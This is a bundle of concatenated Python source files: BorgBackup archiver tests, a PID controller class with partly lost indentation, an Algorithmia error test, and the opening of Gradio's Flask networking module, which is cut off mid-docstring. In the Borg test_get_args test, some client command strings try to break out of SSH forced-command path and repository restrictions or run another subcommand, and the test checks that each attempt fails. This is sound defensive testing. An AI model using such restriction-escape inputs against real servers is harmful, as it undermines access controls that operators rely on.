        config.read(config_path)
        config.set('cache', 'manifest', bin_to_hex(bytes(32)))
        with open(config_path, 'w') as fd:
            config.write(fd)
        out = self.cmd('info', self.repository_location)
        assert 'Cache integrity data not available: old Borg version modified the cache.' in out
class DiffArchiverTestCase(ArchiverTestCaseBase):
    """Tests for 'borg diff' between two archives of the same input tree."""

    def test_basic_functionality(self):
        """Build two snapshots with add/remove/replace/link mutations in between
        and check every expected line of the diff output."""
        # Setup files for the first snapshot
        self.create_regular_file('empty', size=0)
        self.create_regular_file('file_unchanged', size=128)
        self.create_regular_file('file_removed', size=256)
        self.create_regular_file('file_removed2', size=512)
        self.create_regular_file('file_replaced', size=1024)
        os.mkdir('input/dir_replaced_with_file')
        os.chmod('input/dir_replaced_with_file', stat.S_IFDIR | 0o755)
        os.mkdir('input/dir_removed')
        if are_symlinks_supported():
            os.mkdir('input/dir_replaced_with_link')
            os.symlink('input/dir_replaced_with_file', 'input/link_changed')
            os.symlink('input/file_unchanged', 'input/link_removed')
            os.symlink('input/file_removed2', 'input/link_target_removed')
            os.symlink('input/empty', 'input/link_target_contents_changed')
            os.symlink('input/empty', 'input/link_replaced_by_file')
        if are_hardlinks_supported():
            os.link('input/file_replaced', 'input/hardlink_target_replaced')
            os.link('input/empty', 'input/hardlink_contents_changed')
            os.link('input/file_removed', 'input/hardlink_removed')
            os.link('input/file_removed2', 'input/hardlink_target_removed')
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # Create the first snapshot
        self.cmd('create', self.repository_location + '::test0', 'input')
        # Setup files for the second snapshot
        self.create_regular_file('file_added', size=2048)
        self.create_regular_file('file_empty_added', size=0)
        os.unlink('input/file_replaced')
        self.create_regular_file('file_replaced', contents=b'0' * 4096)
        os.unlink('input/file_removed')
        os.unlink('input/file_removed2')
        os.rmdir('input/dir_replaced_with_file')
        self.create_regular_file('dir_replaced_with_file', size=8192)
        os.chmod('input/dir_replaced_with_file', stat.S_IFREG | 0o755)
        os.mkdir('input/dir_added')
        os.rmdir('input/dir_removed')
        if are_symlinks_supported():
            os.rmdir('input/dir_replaced_with_link')
            os.symlink('input/dir_added', 'input/dir_replaced_with_link')
            os.unlink('input/link_changed')
            os.symlink('input/dir_added', 'input/link_changed')
            os.symlink('input/dir_added', 'input/link_added')
            os.unlink('input/link_replaced_by_file')
            self.create_regular_file('link_replaced_by_file', size=16384)
            os.unlink('input/link_removed')
        if are_hardlinks_supported():
            os.unlink('input/hardlink_removed')
            os.link('input/file_added', 'input/hardlink_added')
        with open('input/empty', 'ab') as fd:
            fd.write(b'appended_data')
        # Create the second snapshot
        self.cmd('create', self.repository_location + '::test1a', 'input')
        self.cmd('create', '--chunker-params', '16,18,17,4095', self.repository_location + '::test1b', 'input')

        def do_asserts(output, can_compare_ids):
            # Check the diff output; can_compare_ids is True when both archives
            # used the same chunker params (chunk ids comparable).
            # File contents changed (deleted and replaced with a new file)
            change = 'B' if can_compare_ids else '{:<19}'.format('modified')
            assert 'file_replaced' in output  # added to debug #3494
            assert '{} input/file_replaced'.format(change) in output
            # File unchanged
            assert 'input/file_unchanged' not in output
            # Directory replaced with a regular file
            if 'BORG_TESTS_IGNORE_MODES' not in os.environ:
                assert '[drwxr-xr-x -> -rwxr-xr-x] input/dir_replaced_with_file' in output
            # Basic directory cases
            assert 'added directory input/dir_added' in output
            assert 'removed directory input/dir_removed' in output
            if are_symlinks_supported():
                # Basic symlink cases
                assert 'changed link input/link_changed' in output
                assert 'added link input/link_added' in output
                assert 'removed link input/link_removed' in output
                # Symlink replacing or being replaced
                assert '] input/dir_replaced_with_link' in output
                assert '] input/link_replaced_by_file' in output
                # Symlink target removed. Should not affect the symlink at all.
                assert 'input/link_target_removed' not in output
            # The inode has two links and the file contents changed. Borg
            # should notice the changes in both links. However, the symlink
            # pointing to the file is not changed.
            change = '0 B' if can_compare_ids else '{:<19}'.format('modified')
            assert '{} input/empty'.format(change) in output
            if are_hardlinks_supported():
                assert '{} input/hardlink_contents_changed'.format(change) in output
            if are_symlinks_supported():
                assert 'input/link_target_contents_changed' not in output
            # Added a new file and a hard link to it. Both links to the same
            # inode should appear as separate files.
            assert 'added 2.05 kB input/file_added' in output
            if are_hardlinks_supported():
                assert 'added 2.05 kB input/hardlink_added' in output
            # check if a diff between non-existent and empty new file is found
            assert 'added 0 B input/file_empty_added' in output
            # The inode has two links and both of them are deleted. They should
            # appear as two deleted files.
            assert 'removed 256 B input/file_removed' in output
            if are_hardlinks_supported():
                assert 'removed 256 B input/hardlink_removed' in output
            # Another link (marked previously as the source in borg) to the
            # same inode was removed. This should not change this link at all.
            if are_hardlinks_supported():
                assert 'input/hardlink_target_removed' not in output
            # Another link (marked previously as the source in borg) to the
            # same inode was replaced with a new regular file. This should not
            # change this link at all.
            if are_hardlinks_supported():
                assert 'input/hardlink_target_replaced' not in output

        do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1a'), True)
        # We expect exit_code=1 due to the chunker params warning
        do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1b', exit_code=1), False)

    def test_sort_option(self):
        """'diff --sort' must list changed paths in alphabetical order."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('a_file_removed', size=8)
        self.create_regular_file('f_file_removed', size=16)
        self.create_regular_file('c_file_changed', size=32)
        self.create_regular_file('e_file_changed', size=64)
        self.cmd('create', self.repository_location + '::test0', 'input')
        os.unlink('input/a_file_removed')
        os.unlink('input/f_file_removed')
        os.unlink('input/c_file_changed')
        os.unlink('input/e_file_changed')
        self.create_regular_file('c_file_changed', size=512)
        self.create_regular_file('e_file_changed', size=1024)
        self.create_regular_file('b_file_added', size=128)
        self.create_regular_file('d_file_added', size=256)
        self.cmd('create', self.repository_location + '::test1', 'input')
        output = self.cmd('diff', '--sort', self.repository_location + '::test0', 'test1')
        expected = [
            'a_file_removed',
            'b_file_added',
            'c_file_changed',
            'd_file_added',
            'e_file_changed',
            'f_file_removed',
        ]
        # Each expected name must appear in the corresponding output line.
        assert all(x in line for x, line in zip(expected, output.splitlines()))
def test_get_args():
    """Archiver.get_args must merge the forced 'borg serve' command line with
    the client-supplied SSH_ORIGINAL_COMMAND, without letting the client
    escape the forced restrictions or switch subcommands."""
    archiver = Archiver()
    # everything normal:
    # first param is argv as produced by ssh forced command,
    # second param is like from SSH_ORIGINAL_COMMAND env variable
    args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
                             'borg serve --info --umask=0027')
    assert args.func == archiver.do_serve
    assert args.restrict_to_paths == ['/p1', '/p2']
    assert args.umask == 0o027
    assert args.log_level == 'info'
    # similar, but with --restrict-to-repository
    args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
                             'borg serve --info --umask=0027')
    assert args.restrict_to_repositories == ['/r1', '/r2']
    # trying to cheat - break out of path restriction
    args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
                             'borg serve --restrict-to-path=/')
    assert args.restrict_to_paths == ['/p1', '/p2']
    # trying to cheat - break out of repository restriction
    args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
                             'borg serve --restrict-to-repository=/')
    assert args.restrict_to_repositories == ['/r1', '/r2']
    # trying to cheat - break below repository restriction
    args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
                             'borg serve --restrict-to-repository=/r1/below')
    assert args.restrict_to_repositories == ['/r1', '/r2']
    # trying to cheat - try to execute different subcommand
    args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
                             'borg init --encryption=repokey /')
    assert args.func == archiver.do_serve
    # Check that environment variables in the forced command don't cause issues. If the command
    # were not forced, environment variables would be interpreted by the shell, but this does not
    # happen for forced commands - we get the verbatim command line and need to deal with env vars.
    args = archiver.get_args(['borg', 'serve', ],
                             'BORG_FOO=bar borg serve --info')
    assert args.func == archiver.do_serve
def test_chunk_content_equal():
    """ItemDiff._chunk_content_equal must compare chunk streams by content,
    independently of how the bytes are split across chunks, and must be
    symmetric in its arguments."""
    def ccc(a, b):
        # list() instead of a copying comprehension (same result, idiomatic);
        # each side is materialized so it can be iterated twice below.
        chunks_a = list(a)
        chunks_b = list(b)
        compare1 = ItemDiff._chunk_content_equal(iter(chunks_a), iter(chunks_b))
        compare2 = ItemDiff._chunk_content_equal(iter(chunks_b), iter(chunks_a))
        assert compare1 == compare2  # result must not depend on argument order
        return compare1
    # same content, different chunk boundaries
    assert ccc([
        b'1234', b'567A', b'bC'
    ], [
        b'1', b'23', b'4567A', b'b', b'C'
    ])
    # one iterator exhausted before the other
    assert not ccc([
        b'12345',
    ], [
        b'1234', b'56'
    ])
    # content mismatch
    assert not ccc([
        b'1234', b'65'
    ], [
        b'1234', b'56'
    ])
    # first is the prefix of second
    assert not ccc([
        b'1234', b'56'
    ], [
        b'1234', b'565'
    ])
class TestBuildFilter:
    """Tests for Archiver.build_filter (pattern matching + --strip-components)."""

    @staticmethod
    def peek_and_store_hardlink_masters(item, matched):
        """No-op stand-in for the hardlink-masters callback."""
        pass

    def test_basic(self):
        """Included paths (and their children) pass; everything else is filtered."""
        matcher = PatternMatcher()
        matcher.add([parse_pattern('included')], IECommand.Include)
        # renamed from 'filter' so the builtin is not shadowed
        filter_ = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
        assert filter_(Item(path='included'))
        assert filter_(Item(path='included/file'))
        assert not filter_(Item(path='something else'))

    def test_empty(self):
        """With a fallback-True matcher and no patterns, everything passes."""
        matcher = PatternMatcher(fallback=True)
        filter_ = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
        assert filter_(Item(path='anything'))

    def test_strip_components(self):
        """Items whose whole path would be stripped away must be excluded."""
        matcher = PatternMatcher(fallback=True)
        filter_ = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, strip_components=1)
        assert not filter_(Item(path='shallow'))
        assert not filter_(Item(path='shallow/'))  # can this even happen? paths are normalized...
        assert filter_(Item(path='deep enough/file'))
        assert filter_(Item(path='something/dir/file'))
class TestCommonOptions:
    """Tests for Archiver.CommonOptions: common flags may appear before and/or
    after the subcommand; the subcommand-level occurrence takes precedence."""

    @staticmethod
    def define_common_options(add_common_option):
        # Miniature set of common options mirroring the real borg ones.
        add_common_option('-h', '--help', action='help', help='show this help message and exit')
        add_common_option('--critical', dest='log_level', help='foo',
                          action='store_const', const='critical', default='warning')
        add_common_option('--error', dest='log_level', help='foo',
                          action='store_const', const='error', default='warning')
        add_common_option('--append', dest='append', help='foo',
                          action='append', metavar='TOPIC', default=[])
        add_common_option('-p', '--progress', dest='progress', action='store_true', help='foo')
        add_common_option('--lock-wait', dest='lock_wait', type=int, metavar='N', default=1,
                          help='(default: %(default)d).')

    @pytest.fixture
    def basic_parser(self):
        # Top-level parser carrying the CommonOptions machinery.
        parser = argparse.ArgumentParser(prog='test', description='test parser', add_help=False)
        parser.common_options = Archiver.CommonOptions(self.define_common_options,
                                                       suffix_precedence=('_level0', '_level1'))
        return parser

    @pytest.fixture
    def subparsers(self, basic_parser):
        if sys.version_info >= (3, 7):
            # py37 pre-release defaults to unwanted required=True, in 3.7.0+ it was fixed to =False
            return basic_parser.add_subparsers(title='required arguments', metavar='<command>', required=False)
        else:
            # py36 does not support required=... argument (but behaves like required=False).
            # note: use below call for 3.6 and 3.7 when there are no alphas/betas/RCs of 3.7.0 around any more.
            return basic_parser.add_subparsers(title='required arguments', metavar='<command>')

    @pytest.fixture
    def parser(self, basic_parser):
        # Attach the level-0 (pre-subcommand) common options group.
        basic_parser.common_options.add_common_group(basic_parser, '_level0', provide_defaults=True)
        return basic_parser

    @pytest.fixture
    def common_parser(self, parser):
        # Level-1 (post-subcommand) common options, shared via parents=[...].
        common_parser = argparse.ArgumentParser(add_help=False, prog='test')
        parser.common_options.add_common_group(common_parser, '_level1')
        return common_parser

    @pytest.fixture
    def parse_vars_from_line(self, parser, subparsers, common_parser):
        # Build one 'subcommand' subparser and return a helper that parses a
        # command line and returns the resolved namespace as a dict.
        subparser = subparsers.add_parser('subcommand', parents=[common_parser], add_help=False,
                                          description='foo', epilog='bar', help='baz',
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=1234)
        subparser.add_argument('--append-only', dest='append_only', action='store_true')

        def parse_vars_from_line(*line):
            print(line)
            args = parser.parse_args(line)
            parser.common_options.resolve(args)
            return vars(args)
        return parse_vars_from_line

    def test_simple(self, parse_vars_from_line):
        """Defaults, precedence of the subcommand-level flag, and 'append' merging."""
        assert parse_vars_from_line('--error') == {
            'append': [],
            'lock_wait': 1,
            'log_level': 'error',
            'progress': False
        }
        assert parse_vars_from_line('--error', 'subcommand', '--critical') == {
            'append': [],
            'lock_wait': 1,
            'log_level': 'critical',
            'progress': False,
            'append_only': False,
            'func': 1234,
        }
        # subcommand-only option is rejected before the subcommand
        with pytest.raises(SystemExit):
            parse_vars_from_line('--append-only', 'subcommand')
        assert parse_vars_from_line('--append=foo', '--append', 'bar', 'subcommand', '--append', 'baz') == {
            'append': ['foo', 'bar', 'baz'],
            'lock_wait': 1,
            'log_level': 'warning',
            'progress': False,
            'append_only': False,
            'func': 1234,
        }

    @pytest.mark.parametrize('position', ('before', 'after', 'both'))
    @pytest.mark.parametrize('flag,args_key,args_value', (
        ('-p', 'progress', True),
        ('--lock-wait=3', 'lock_wait', 3),
    ))
    def test_flag_position_independence(self, parse_vars_from_line, position, flag, args_key, args_value):
        """A common flag must have the same effect before, after, or on both
        sides of the subcommand."""
        line = []
        if position in ('before', 'both'):
            line.append(flag)
        line.append('subcommand')
        if position in ('after', 'both'):
            line.append(flag)
        result = {
            'append': [],
            'lock_wait': 1,
            'log_level': 'warning',
            'progress': False,
            'append_only': False,
            'func': 1234,
        }
        result[args_key] = args_value
        assert parse_vars_from_line(*line) == result
def test_parse_storage_quota():
    """parse_storage_quota parses '50M' to bytes and rejects a too-small quota."""
    fifty_megabytes = 50 * 1000 ** 2
    assert parse_storage_quota('50M') == fifty_megabytes
    with pytest.raises(argparse.ArgumentTypeError):
        parse_storage_quota('5M')
def get_all_parsers():
    """
    Return dict mapping command to parser.
    """
    root_parser = Archiver(prog='borg').build_parser()
    borgfs_parser = Archiver(prog='borgfs').build_parser()
    parsers = {}

    def discover_level(prefix, parser, Archiver, extra_choices=None):
        # Collect every subcommand parser one level below `parser`.
        choices = {}
        for action in parser._actions:
            if action.choices is not None and 'SubParsersAction' in str(action.__class__):
                choices.update((prefix + cmd, subparser)
                               for cmd, subparser in action.choices.items())
        if extra_choices is not None:
            choices.update(extra_choices)
        if prefix and not choices:
            return
        # Recurse depth-first, then record each command at this level.
        for command, subparser in sorted(choices.items()):
            discover_level(command + " ", subparser, Archiver)
            parsers[command] = subparser

    discover_level("", root_parser, Archiver, {'borgfs': borgfs_parser})
    return parsers
@pytest.mark.parametrize('command, parser', list(get_all_parsers().items()))
def test_help_formatting(command, parser):
    # Every lazily-rendered epilog must carry non-empty rst source text.
    if isinstance(parser.epilog, RstToTextLazy):
        assert parser.epilog.rst
@pytest.mark.parametrize('topic, helptext', list(Archiver.helptext.items()))
def test_help_formatting_helptexts(topic, helptext):
    # Every help topic must render to non-empty terminal text without raising.
    assert str(rst_to_terminal(helptext))
|
pid.py |
# -*- coding: utf-8 -*-
'''
Created on 11/04/2015
@author: david
'''
import logging
from threading import Thread
import time
class Pid(object):
'''
Proportional Integrative Derivative stabilizer
'''
#Period range to be considered as correct loop rate
PERIOD_RANGE_MARGIN = 0.1
def __init__(self, period, length, readInputDelegate, setOutputDelegate, pidName = ""):
'''
Constructor
@param period: Timerate to perform each calculation
@param length: Number of items to stabilize
@param readInputDelegate: Method to gather current values.
Must return an array with the same number of items to stabilize
@param setOutputDelegate: Delegate's param is an array with the values to react,
one for each item to stabilize.
@param pidName: (optional) Name to identify the PID-thread among other ones.
'''
self._pidName = pidName
self._targets = [0.0] * length
self._integrals = [0.0] * length
self._lastErrors = [0.0] * length
self._period = period
self._minPeriod = period * (1.0 - Pid.PERIOD_RANGE_MARGIN)
self._maxPeriod = period * (1.0 + Pid.PERIOD_RANGE_MARGIN)
self._periodTarget = (self._minPeriod + self._period) / 2.0
self._previousTime = time.time()
self._currentPeriod = period
self._kp = [0.0] * length
self._ki = [0.0] * length
self._kd = [0.0] * length
self._readInput = readInputDelegate
self._setOutput = setOutputDelegate
self._isRunning = False
self._isPaused = False
self._thread = None
self._length = length
self._integralLocked = [False] * length
self._deltaTimeSum = 0.0
self._iterationCount = 0
def setProportionalConstants(self, kpMatrix):
"""
@param kpMatrix: Proportional constant array. One for each item to stabilize
"""
if self._length == len(kpMatrix):
self._kp = kpMatrix
else:
raise Exception("Wrong matrix length")
return self
def setIntegralConstants(self, kiMatrix):
"""
@param kiMatrix: Integral constant array. One for each item to stabilize
"""
if self._length == len(kiMatrix):
self._ki = kiMatrix
else:
raise Exception("Wrong matrix length")
return self
def setDerivativeConstants(self, kdMatrix):
"""
@param kdMatrix: Derivative constant array. One for each item to stabilize
"""
if self._length == len(kdMatrix):
self._kd = kdMatrix
else:
raise Exception("Wrong matrix length")
return self
def getProportionalConstants(self):
"""
@return: Proportional constants array
"""
return self._kp
def getIntegralConstants(self):
"""
@return: Integral constants array
"""
return self._ki
def getDerivativeConstants(self):
"""
@return: Derivative constants array
"""
return self._kd
def _calculate(self):
"""
Performs the stabilization
"""
outputArray = [0.0]*self._length
currentValues = self._readInput()
currentTime = time.time()
dt = currentTime - self._previousTime
for i in range(self._length):
error = self._targets[i] - currentValues[i]
#Proportional stabilization
pPart = self._kp[i] * error
#Integral stabilization
if not self._integralLocked[i]:
self._integrals[i] += error * dt
iPart = self._ki[i] * self._integrals[i]
#Derivative stabilization
dPart = self._kd[i] * (error - self._lastErrors[i]) / dt
self._lastErrors[i] = error
#Join partial results
result = pPart + iPart + dPart
outputArray[i] = result
self._previousTime = currentTime
self._setOutput(outputArray)
self._currentPeriod = dt
self._deltaTimeSum += dt
self._iterationCount += 1
def setTarget(self, target, index):
"""
Sets target for any item
@param target: Value to reach
@param index: Item to change
"""
self._targets[index] = target
def setTargets(self, targets):
"""
Sets targets
@param targets: Array with the targets to reach. One for each item to stabilize.
"""
self._targets = targets
def getTarget(self, index):
"""
Gets the current target for an item
@param index: Item index
@return: Current target
"""
return self._targets[index]
def getTargets(self):
"""
Gets all current targets
@return: Array of current targets
"""
return self._targets
def getCurrentPeriod(self):
"""
Gets the current target period
@return: Current target period
"""
return self._currentPeriod
def _do(self):
"""
Performs the stabilization
"""
dtSum = 0.0
iterCount = 0
underFreq = 0
overFreq = 0
rightFreq = 0
acceptableFreq = 0
sleepErrorSum = 0.0
sleepTime = self._period
self._previousTime = time.time()
time.sleep(self._period)
while self._isRunning:
t0 = time.time()
self._calculate()
calculationTime = time.time() - t0
dtSum += calculationTime
iterCount += 1
if self._currentPeriod < self._minPeriod:
overFreq += 1
elif self._currentPeriod >= self._minPeriod and self._currentPeriod <= self._period:
rightFreq += 1
elif self._currentPeriod > self._period and self._currentPeriod <= self._maxPeriod:
acceptableFreq += 1
else:
underFreq += 1
freq = 1.0/self._maxPeriod
currentFreq = 1.0/self._currentPeriod
message="I cannot operate at min. {0:.3f}Hz. Current rate is {1:.3f}Hz".format(freq, currentFreq)
#print message
logging.debug(message)
sleepError = self._period - self._currentPeriod
sleepErrorSum += sleepError
sleepTime += 0.6 * sleepError + 0.2 * sleepErrorSum
if sleepTime > 0.0:
time.sleep(sleepTime)
else:
time.sleep(0.001)
if dtSum != 0.0 and iterCount != 0:
tAvg = dtSum * 1000.0 / iterCount
fAvg = float(iterCount) / dtSum
else:
tAvg = 0.0
fAvg = float("inf")
message = "PID-{0} (net values) t: {1:.3f}ms; f: {2:.3f}Hz".format(self._pidName, tAvg, fAvg)
logging.info(message)
#print message
underFreqPerc = underFreq * 100.0 / iterCount
overFreqPerc = overFreq * 100.0 / iterCount
rightFreqPerc = rightFreq * 100.0 / iterCount
acceptableFreqPerc = acceptableFreq * 100.0 / iterCount
message = "In freq: {0:.3f}%; Acceptable: {1:.3f}%; Under f.: {2:.3f}%; Over f.: {3:.3f}%"\
.format(rightFreqPerc, acceptableFreqPerc, underFreqPerc, overFreqPerc)
logging.info(message)
#print message
def start(self):
"""
Starts stabilization.
Inits a thread to perform calculations in background
"""
if not self._isPaused and (self._thread == None or not self._thread.isAlive()):
logging.info("Starting PID-{0}".format(self._pidName))
self._deltaTimeSum = 0.0
self._iterationCount = 0
#Reset PID variables
length = len(self._kp)
self._integrals = [0.0] * length
self._lastErrors = [0.0] * length
self._isRunning = True
self._thread = Thread(target=self._do)
self._thread.start()
def stop(self):
"""
Stops the stabilization.
"""
self._isRunning = False
self._isPaused = False
if self._thread != None and self._thread.isAlive():
self._thread.join()
logging.info("PID-{0} stopped".format(self._pidName))
if self._iterationCount != 0 and self._deltaTimeSum != 0.0:
averageDeltaTime = self._deltaTimeSum * 1000.0/ self._iterationCount
averageFrequency = self._iterationCount / self._deltaTimeSum
else:
averageDeltaTime = 0.0
averageFrequency = float("inf")
message = "PID-\"{0}\" - Avg. time: {1:.3f}ms - Avg. freq: {2:.3f}Hz".format(self._pidName, averageDeltaTime, averageFrequency)
#print message
logging.info(message)
def pause(self):
'''
Pauses the stabilization
'''
if self._isRunning and self._thread != None and self._thread.isAlive():
self._isRunning = False
self._isPaused = True
self._thread.join()
logging.info("PID-{0} paused".format(self._pidName))
def resume(self):
'''
Resumes the stabilization
'''
if self._isPaused and (self._thread == None or not self._thread.isAlive()):
logging.info("Resuming PID-{0}".format(self._pidName))
self._isRunning = True
self._isPaused = False
self._thread = Thread(target=self._do)
self._thread.start()
def isRunning(self):
"""
@return: Reports whether the PID stabilization is currently running
"""
return self._isRunning
def isPaused(self):
'''
@return: Reports whether the PID stabilization is currently paused
'''
return self._isPaused
def lockIntegral(self, index):
"""
Locks the result's integral part of any item
@param index: Item index
"""
self._integralLocked[index] = True
def unlockIntegral(self, index):
"""
Unlocks the result's integral part of any item
@param index: Item index
"""
self._integralLocked[index] = False
def resetIntegral(self, index):
    """
    Clears the accumulated integral of one controlled item.
    @param index: Item index
    """
    self._integrals[index] = 0.0
def resetIntegrals(self):
    '''
    Clears the accumulated integral of every controlled item
    (one slot per configured proportional gain).
    '''
    self._integrals = [0.0 for _ in self._kp]
def resetTime(self):
    """
    Re-anchors the delta-time reference to the current moment.
    """
    self._previousTime = time.time()
|
algo_failure_test.py | import sys
if sys.version_info[0] >= 3:
import unittest
import Algorithmia
import uvicorn
import time
from multiprocessing import Process
# look in ../ BEFORE trying to import Algorithmia. If you append to the path
# instead, you will load the version installed on the computer.
sys.path = ['../'] + sys.path
from requests import Response
from Test.api import app
def start_webserver():
    # Serve the mocked API app locally so the tests can exercise real
    # HTTP round-trips against it.
    uvicorn.run(app, host="127.0.0.1", port=8080, log_level="debug")
class AlgoTest(unittest.TestCase):
    """Verifies that server-side 500 errors surface through the client."""

    # Canned 500 response used as the expected error value.
    error_500 = Response()
    error_500.status_code = 500

    def setUp(self):
        # Point the client at the local mock server and boot it in a
        # separate process; the sleep gives uvicorn time to bind the port.
        self.client = Algorithmia.client(api_address="http://localhost:8080")
        self.uvi_p = Process(target=start_webserver)
        self.uvi_p.start()
        time.sleep(1)

    def tearDown(self):
        self.uvi_p.terminate()

    def test_throw_500_error_HTTP_response_on_algo_request(self):
        try:
            result = self.client.algo('util/500').pipe(bytearray('foo', 'utf-8'))
        except Exception as e:
            result = e
        self.assertEqual(str(self.error_500), str(result))
|
networking.py | """
Defines helper methods useful for setting up ports, launching servers, and handling `ngrok`
"""
import os
import socket
import threading
from flask import Flask, request, session, jsonify, abort, send_file, render_template, redirect
from flask_cachebuster import CacheBuster
from flask_login import LoginManager, login_user, current_user, login_required
from flask_cors import CORS
import threading
import pkg_resources
import datetime
import time
import json
import urllib.request
from shutil import copyfile
import requests
import sys
import csv
import logging
from gradio.tunneling import create_tunnel
from gradio import encryptor
from gradio import queue
from functools import wraps
import io
import inspect
import traceback
from werkzeug.security import safe_join
# Server/port configuration, resolved from the environment with defaults.
INITIAL_PORT_VALUE = int(os.getenv(
    'GRADIO_SERVER_PORT', "7860"))  # The http server will try to open on port 7860. If not available, 7861, 7862, etc.
TRY_NUM_PORTS = int(os.getenv(
    'GRADIO_NUM_PORTS', "100"))  # Number of ports to try before giving up and throwing an exception.
LOCALHOST_NAME = os.getenv(
    'GRADIO_SERVER_NAME', "127.0.0.1")
GRADIO_API_SERVER = "https://api.gradio.app/v1/tunnel-request"
GRADIO_FEATURE_ANALYTICS_URL = "https://api.gradio.app/gradio-feature-analytics/"
# Locations of the frontend assets bundled with the installed package.
STATIC_TEMPLATE_LIB = pkg_resources.resource_filename("gradio", "templates/")
STATIC_PATH_LIB = pkg_resources.resource_filename("gradio", "templates/frontend/static")
VERSION_FILE = pkg_resources.resource_filename("gradio", "version.txt")
with open(VERSION_FILE) as version_file:
    # Version-pinned CDN root used for static assets when the app is shared.
    GRADIO_STATIC_ROOT = "https://gradio.s3-us-west-2.amazonaws.com/" + \
        version_file.read().strip() + "/static/"
# Flask app plus cache-busting, CORS and login support.
app = Flask(__name__,
            template_folder=STATIC_TEMPLATE_LIB,
            static_folder="",
            static_url_path="/none/")
app.url_map.strict_slashes = False
CORS(app)
cache_buster = CacheBuster(
    config={'extensions': ['.js', '.css'], 'hash_size': 5})
cache_buster.init_app(app)
app.secret_key = os.getenv("GRADIO_KEY", "secret")
login_manager = LoginManager()
login_manager.login_view = 'login'
login_manager.init_app(app)
# Hide Flask default message
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
class User:
    """Minimal flask-login user record carrying only an identifier."""

    def __init__(self, id):
        # flask-login protocol attributes: every constructed user counts
        # as an authenticated, active, non-anonymous account.
        self.is_authenticated = True
        self.is_active = True
        self.is_anonymous = False
        self.id = id

    def get_id(self):
        """Return the identifier flask-login stores in the session."""
        return self.id
@login_manager.user_loader
def load_user(_id):
    # Rehydrate a session user purely from the id flask-login stored.
    return User(_id)
def login_check(func):
    """Decorator: enforce flask-login auth only when the app has auth configured."""
    @wraps(func)
    def wrapper(*args, **kwargs):
        if not app.auth:
            # No credentials configured -> the endpoint is public.
            return func(*args, **kwargs)

        @login_required
        def protected(*args, **kwargs):
            return func(*args, **kwargs)

        return protected(*args, **kwargs)
    return wrapper
def get_local_ip_address():
    """Return this machine's public IP address, or a placeholder when offline."""
    try:
        return requests.get('https://api.ipify.org', timeout=3).text
    except (requests.ConnectionError, requests.exceptions.ReadTimeout):
        return "No internet connection"
# Resolved once at import time; reused by the analytics calls below.
IP_ADDRESS = get_local_ip_address()
def get_first_available_port(initial, final):
    """
    Gets the first open port in a specified range of port numbers
    :param initial: the initial value in the range of port numbers
    :param final: final (exclusive) value in the range of port numbers, should be greater than `initial`
    :return: the first port in [initial, final) that could be bound
    """
    for port in range(initial, final):
        s = socket.socket()  # create a probe socket
        try:
            s.bind((LOCALHOST_NAME, port))  # Bind to the port
            return port
        except OSError:
            pass
        finally:
            # BUG FIX: the probe socket was previously left open when bind()
            # raised; always close it so file descriptors do not leak.
            s.close()
    raise OSError(
        "All ports from {} to {} are in use. Please close a port.".format(
            initial, final
        )
    )
@app.route("/", methods=["GET"])
@login_check
def main():
session["state"] = None
return render_template("frontend/index.html", config=app.interface.config)
@app.route("/static/<path:path>", methods=["GET"])
def static_resource(path):
if app.interface.share:
return redirect(GRADIO_STATIC_ROOT + path)
else:
return send_file(safe_join(STATIC_PATH_LIB, path))
# TODO(@aliabid94): this throws a 500 error if app.auth is None (should probably just redirect to '/')
@app.route('/login', methods=["GET", "POST"])
def login():
    if request.method == "GET":
        # Render the UI with the auth-aware config so it can show a login form.
        config = get_config()
        return render_template("frontend/index.html", config=config)
    elif request.method == "POST":
        username = request.form.get("username")
        password = request.form.get("password")
        # app.auth is either a credentials dict or a callable validator.
        if callable(app.auth):
            authorized = app.auth(username, password)
        else:
            authorized = username in app.auth and app.auth[username] == password
        if authorized:
            login_user(User(username))
            return redirect("/")
        else:
            return abort(401)
@app.route("/config/", methods=["GET"])
def get_config():
if app.interface.auth is None or current_user.is_authenticated:
return jsonify(app.interface.config)
else:
return {"auth_required": True, "auth_message": app.interface.auth_message}
@app.route("/enable_sharing/<path:path>", methods=["GET"])
@login_check
def enable_sharing(path):
if path == "None":
path = None
app.interface.config["share_url"] = path
return jsonify(success=True)
@app.route("/shutdown", methods=['GET'])
def shutdown():
shutdown_func = request.environ.get('werkzeug.server.shutdown')
if shutdown_func is None:
raise RuntimeError('Not running werkzeug')
shutdown_func()
return "Shutting down..."
@app.route("/api/predict/", methods=["POST"])
@login_check
def predict():
raw_input = request.json["data"]
# Capture any errors made and pipe to front end
if app.interface.show_error:
try:
prediction, durations = app.interface.process(raw_input)
except BaseException as error:
traceback.print_exc()
return jsonify({"error": str(error)}), 500
else:
prediction, durations = app.interface.process(raw_input)
avg_durations = []
for i, duration in enumerate(durations):
app.interface.predict_durations[i][0] += duration
app.interface.predict_durations[i][1] += 1
avg_durations.append(app.interface.predict_durations[i][0]
/ app.interface.predict_durations[i][1])
app.interface.config["avg_durations"] = avg_durations
output = {"data": prediction, "durations": durations, "avg_durations": avg_durations}
if app.interface.allow_flagging == "auto":
try:
flag_index = flag_data(raw_input, prediction,
flag_option=(None if app.interface.flagging_options is None else ""),
username=current_user.id if current_user.is_authenticated else None)
output["flag_index"] = flag_index
except Exception as e:
print(str(e))
pass
return jsonify(output)
def get_types(cls_set, component):
    """
    Pull human-readable type documentation out of component docstrings.

    For inputs the relevant line is the second line of ``preprocess``'s
